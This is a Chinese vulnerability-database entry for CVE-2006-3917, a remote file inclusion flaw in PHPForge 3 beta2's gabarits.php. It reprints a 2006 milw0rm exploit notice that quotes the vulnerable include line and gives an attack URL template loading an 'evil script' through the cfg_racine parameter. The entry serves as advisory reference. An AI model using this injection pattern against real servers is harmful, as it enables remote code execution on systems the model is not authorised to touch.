PHP Forge Cfg_Racine 'gabarits.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110658 漏洞类型 输入验证
发布时间 2006-07-22 更新时间 2006-08-02
CVE编号 CVE-2006-3917 CNNVD-ID CNNVD-200607-485
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2058
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-485
|漏洞详情
R.CorsonPHPForge3beta2及之前版本中的inc/gabarits.php存在远程文件包含漏洞。远程攻击者可以借助cfg_racine参数中的URL执行任意PHP代码。
|漏洞EXP
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
phpforge3b2(cfg_racine) Remote File Inclusion Vulnerability
------------------------
Virangar Security Team
www.virangar.org >public
www.virangar.net >priv8
--------
Discoverd By : Snake & hadihadi_zedehal
contact  :  Snake.Apollyon@YaHo0.com  ** hadihadi_zedehal_2006@YaHo0.com
special tnx 2: A.Nosrati * l0pht.Blackhot * Kouros.virus & all virangar members
greetz:hadi_aryaie2004 * ahmad_virangar2004  * mahtab_e66
---------
bug found in file :gabarits.php
Remote : Yes
Critical Level : Dangerous
web:http://phpforge.oirac.com/
---------
vlu codes:
include_once($cfg_racine."inc/systeme.php");
---------

http://www.victim.com/[patch]/inc/gabarits.php?cfg_racine=[evil script]

--------
See you in Hell!!.....
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

# milw0rm.com [2006-07-22]
|参考资料

来源:XF
名称:phpforge-gabarits-file-include(27919)
链接:http://xforce.iss.net/xforce/xfdb/27919
来源:BID
名称:19139
链接:http://www.securityfocus.com/bid/19139
来源:MILW0RM
名称:2058
链接:http://www.milw0rm.com/exploits/2058
来源:VUPEN
名称:ADV-2006-2938
链接:http://www.frsirt.com/english/advisories/2006/2938
来源:MILW0RM
名称:2058
链接:http://milw0rm.com/exploits/2058